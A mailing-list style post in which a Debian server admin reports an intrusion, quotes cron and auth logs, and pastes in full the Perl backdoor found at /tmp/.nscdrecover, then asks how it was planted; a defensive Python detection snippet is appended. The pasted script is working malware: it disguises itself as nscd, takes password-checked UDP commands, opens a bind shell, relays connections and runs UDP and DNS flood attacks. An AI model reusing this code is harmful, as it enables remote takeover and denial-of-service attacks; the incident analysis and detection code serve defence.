Hello,
I logged in to my server today to find that
/usr/sbin/nscd was running about 50 copies.
Since I don't have BIND installed, obviously
something was up... they were also running as
the user www-data...
After a little bit of research I found a new
crontab entry:

File: /tmp/crontab.XXXXLYukbF
0 * * * * /tmp/.nscdrecover

This starts at
auth.log.0:Jun  6 17:00:01 debian PAM_unix[26934]: (cron) session opened for user www-data by (uid=0)
auth.log.0:Jun  6 17:00:02 debian PAM_unix[26934]: (cron) session closed for user www-data
and runs every hour.

and under syslog it starts:

syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)

So I found /tmp/.nscdrecover and it looks like
some kind of port scanner/trojan.

The contents are pasted below:


#!/usr/bin/perl -w

# crypt() hash of the controller password; a command is accepted only if crypt($pw, $pass) eq $pass
$pass = "J9YcGEyNypkzI";
# filler payload sent by the udp flood
$str = 'Mess with the best - die like a rest!'x1337;
use IO::Socket;
use IO::Select;
use POSIX;

# redir: wait (at most 60 s) for one TCP connection on $port, then relay it to $dest (bounce/proxy)
sub redir
{
    my $port = shift;
    my $dest = shift;
    $SIG{ALRM} = sub { exit };
    alarm 60;
    $sa = IO::Socket::INET->new( Proto => "tcp", Listen => 1, ReuseAddr => 1,
                                 LocalPort => $port) or exit;
    $sin = $sa->accept or exit;
    close($sa);
    alarm 0;
    $sout = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $dest) or exit;
    $sin->autoflush(1);
    $sout->autoflush(1);
    $sel = IO::Select->new($sin, $sout);
    while(@sock = $sel->can_read(180)) {
        foreach $s(@sock) {
            $buf = <$s>; exit unless($buf);
            print $sout $buf if($s eq $sin);
            print $sin $buf if($s eq $sout);
        }
    }
}

# shell: listen on $port (60 s timeout), attach stdin/stdout/stderr to the accepted
# connection and exec /bin/sh, i.e. a bind shell running as the cron user (www-data)
sub shell
{
    my $port = shift;
    $SIG{ALRM} = sub { exit };
    alarm 60;
    use Socket;
    socket(S, PF_INET, SOCK_STREAM, 0);
    setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
    bind(S, sockaddr_in($port, INADDR_ANY));
    listen(S, 1);
    accept(X, S);
    close(S);
    alarm 0;
    open STDIN, "<&X";
    open STDOUT, ">&X";
    open STDERR, ">&X";
    close X;
    exec("/bin/sh");
}

# udp: flood $host with $str on a random UDP port for $time seconds (15 s if none given)
sub udp
{
    my $host = shift;
    my $time = shift;
    $sock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host,
                                  PeerPort => int(rand 65535)) or exit;
    $sock->autoflush(1);
    $SIG{ALRM} = sub { exit };
    alarm 15 unless(alarm $time);
    print $sock $str while(1);
}
}   # stray closing brace, present in the script exactly as pasted

# ddns: flood $host on UDP/53 with hand-built PTR (in-addr.arpa) queries for random addresses
sub ddns
{
    my $host = shift;
    my $time = shift;
    $sock = new IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host,
                                      PeerPort => 53) or exit;
    $sock->autoflush(1);
    $SIG{ALRM} = sub { exit };
    alarm 15 unless(alarm $time);
    while(1) {
        my $s = int(rand(89)+10);     # two ASCII digits used as the DNS query id
        my $r1 = int(rand(89)+10);    # four two-digit labels for the reversed address
        my $r2 = int(rand(89)+10);
        my $r3 = int(rand(89)+10);
        my $r4 = int(rand(89)+10);
        # raw DNS header followed by the question "r1.r2.r3.r4.in-addr.arpa PTR IN"
        send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);
    }
}

# daemonise: disguise the process title as nscd (padded so ps shows nothing after it),
# fork off the parent, ignore the usual signals, detach from the terminal
$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
$SIG{ALRM} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';
$SIG{INT} = 'IGNORE';
$SIG{QUIT} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
open STDIN, "</dev/null";
open STDOUT, ">/dev/null";
open STDERR, ">/dev/null";
POSIX::setsid();

# control channel: UDP port 1337, one datagram per command "<password> <cmd> <arg1> [<arg2>]"
$csock = IO::Socket::INET->new(Proto => 'udp', LocalPort => 1337, ReuseAddr => 1) or exit;
while($string = <$csock>)
{
    chop($string);
    my ($pw, $cmd, $arg1, $arg2) = split " ", $string;
    next unless($cmd);
    next unless($arg1);
    next unless(crypt($pw, $pass) eq $pass);
    if ($cmd eq "ping") {
        # answer "pong <uname -mnrs>" to $arg1:$arg2 so the controller can enumerate bots
        my $bsock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $arg1,
                                          PeerPort => $arg2, ReuseAddr => 1) or next;
        print $bsock "pong ".`uname -mnrs`;
        close $bsock;
    } elsif ($cmd eq "die") {
        exit if(crypt($arg1, $pass) eq $pass);
    } elsif ($cmd eq "redir") {
        redir($arg1, $arg2) unless(fork);
    } elsif ($cmd eq "shell") {
        shell($arg1) unless(fork);
    } elsif ($cmd eq "udp") {
        udp($arg1, $arg2) unless(fork);
    } elsif ($cmd eq "ddns") {
        ddns($arg1, $arg2) unless(fork);
    }
}



A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with Debian so I could
have automatic updates and the like. I copied
over a few of the home directories from the old
site. Then this all started after a user logged
in on Friday June 6th: first login at 14:16,
ending 14:24; the script starts at 14:27.


worldspe ftpd26405    pm6-s104.amazon. Fri Jun  6 15:06 - 15:06  (00:00)
worldspe ftpd26325    pm6-s104.amazon. Fri Jun  6 14:51 - 14:51  (00:00)
worldspe ftpd26315    pm6-s104.amazon. Fri Jun  6 14:49 - 14:49  (00:00)
worldspe ftpd26291    pm6-s104.amazon. Fri Jun  6 14:43 - 14:44  (00:00)
worldspe ftpd26183    pm6-s104.amazon. Fri Jun  6 14:16 - 14:24  (00:07)

The question is: could this have been started via
a PHP script, and if so, what should I look for in
order to neutralize it and communicate with this
user?
I already moved the /tmp file out.

While grepping the PHP files I found nothing that
had /tmp or nscd listed in it at all. This is
just kind of weird, and I was wondering if
anybody could be of help. Also, no other files or
cgi-bin files were uploaded, so it might just be
a coincidence, but my logic points to it being
something that happened via something that was
uploaded.


I just don't know where this came from. I am
running Debian 3.0 woody with all security
update files. I ran rtkitchk and found nothing.
So I'm really perplexed as to what could have got
this script on the server. Any help would be
greatly appreciated as I found nothing about
this script on Google.
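Two checks a defender can run against what this post shows, as an added example that is not from the post or from any tool it mentions: scanning syslog for crontab REPLACE events by a web-server account and for cron jobs launched out of /tmp (the trail the post quotes), and comparing a process's claimed argv[0] against /proc/<pid>/exe, since the script overwrites $0 with '/usr/sbin/nscd'. SAMPLE_SYSLOG is a constructed sample in the post's log format; SERVICE_ACCOUNTS and the interpreter-name list are assumptions.

```python
import os
import re
# Syslog lines in the format quoted in the post (constructed sample, not a live log)
SAMPLE_SYSLOG = """\
Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)
Jun  6 17:17:01 debian /USR/SBIN/CRON[26950]: (root) CMD (run-parts /etc/cron.hourly)
"""

SERVICE_ACCOUNTS = {"www-data", "nobody", "apache"}  # assumed: should never edit crontabs
CRONTAB_RE = re.compile(r"crontab\[\d+\]: \((\S+)\) (REPLACE|DELETE) ")
CRON_CMD_RE = re.compile(r"CRON\[\d+\]: \((\S+)\) CMD \((.*)\)$")

def suspicious_cron_events(log_text):
    """(line_no, reason) for crontab edits by service accounts and for cron
    jobs whose command lives in a scratch directory or is a dotfile."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = CRONTAB_RE.search(line)
        if m and m.group(1) in SERVICE_ACCOUNTS:
            findings.append((n, f"crontab {m.group(2)} by {m.group(1)}"))
            continue
        m = CRON_CMD_RE.search(line)
        if m:
            cmd = (m.group(2).split() or [""])[0]
            if cmd.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")) or "/." in cmd:
                findings.append((n, f"cron job for {m.group(1)} runs {cmd}"))
    return findings

def masquerading(cmdline, exe):
    """True when argv[0] (the script overwrites it with '/usr/sbin/nscd' plus
    padding) names something other than the interpreter behind /proc/<pid>/exe."""
    claimed = os.path.basename(cmdline.split("\0")[0].strip()).lstrip("-")
    interp = os.path.basename(exe)
    return interp.startswith(("perl", "python", "sh", "bash")) and not interp.startswith(claimed)

def scan_proc():
    """Walk /proc on a live Linux host; returns (pid, argv0, exe) for hits."""
    hits = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().decode(errors="replace")
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue
        if cmdline and masquerading(cmdline, exe):
            hits.append((int(pid), cmdline.split("\0")[0].strip(), exe))
    return hits
```

scan_proc() only sees the exe links of processes the caller may inspect, so run it as root to cover every process, and treat a hit as a lead to confirm with `ls -l /proc/<pid>/exe` and `cat /proc/<pid>/cmdline`, not as proof on its own.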

